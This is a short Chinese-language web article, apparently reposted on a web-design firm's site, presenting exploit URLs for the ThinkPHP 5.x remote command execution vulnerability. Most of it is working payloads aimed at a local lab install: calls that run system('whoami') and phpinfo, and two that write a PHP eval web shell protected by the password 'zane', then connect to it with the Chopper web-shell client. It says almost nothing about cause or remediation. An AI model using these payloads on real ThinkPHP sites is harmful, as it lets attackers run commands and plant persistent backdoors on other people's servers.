這篇文章主要介紹thinkphp_5x_命令執(zhí)行漏洞的示例分析,文中介紹的非常詳細,具有一定的參考價值,感興趣的小伙伴們一定要看完!
成都創(chuàng)新互聯(lián)從2013年成立,先為峨山縣等服務建站,峨山縣等地企業(yè),進行企業(yè)商務咨詢服務。為峨山縣企業(yè)網站制作PC+手機+微官網三網同步一站式服務解決您的所有建站問題。
thinkphp_5x_命令執(zhí)行漏洞
受影響版本包括5.0和5.1版本
docker漏洞環(huán)境源碼:https://github.com/vulnspy/thinkphp-5.1.29
本地環(huán)境搭建:
thinkphp5.0.15+php5.6n+ apache2.0http://www.thinkphp.cn/donate/download/id/1125.html
EXPhttp://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
EXP:http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["zane"])?^>>shell.php 或者 http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK<?php @eval($_POST["zane"])?>
使用菜刀連接
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php 密碼為zane
http://127.0.0.1/middleware/thinkphp_5.0.15_full/test.php 密碼為zane
以上是“thinkphp_5x_命令執(zhí)行漏洞的示例分析”這篇文章的所有內容,感謝各位的閱讀!希望分享的內容對大家有幫助,更多相關知識,歡迎關注創(chuàng)新互聯(lián)行業(yè)資訊頻道!
分享名稱:thinkphp_5x_命令執(zhí)行漏洞的示例分析
標題鏈接:http://www.rwnh.cn/article32/psgepc.html
成都網站建設公司_創(chuàng)新互聯(lián),為您提供網站制作、Google、外貿建站、小程序開發(fā)、域名注冊、網站建設
聲明:本網站發(fā)布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經允許不得轉載,或轉載時需注明來源: 創(chuàng)新互聯(lián)